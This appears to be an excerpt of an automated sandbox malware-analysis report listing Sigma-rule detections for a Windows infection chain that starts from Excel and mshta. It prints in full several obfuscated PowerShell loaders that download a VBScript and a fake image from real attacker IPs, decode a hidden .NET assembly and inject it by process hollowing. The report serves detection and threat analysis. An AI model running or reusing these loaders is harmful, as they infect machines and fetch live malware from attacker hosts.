Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2988, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , ProcessId: 3264, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1
                    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 94.156.65.247, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3264, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5O
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1704, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 1100, ProcessName: mshta.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2988, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , ProcessId: 3264, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2988, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline", ProcessId: 3160, ProcessName: csc.exe
                    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 192.185.89.92, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1704, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2988, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\eveningfiledatinglover[1].vbs
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 94.156.65.247, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3264, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
                    Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, QueryName: ip-api.com
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1704, Protocol: tcp, SourceIp: 192.185.89.92, SourceIsIpv6: false, SourcePort: 80
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; 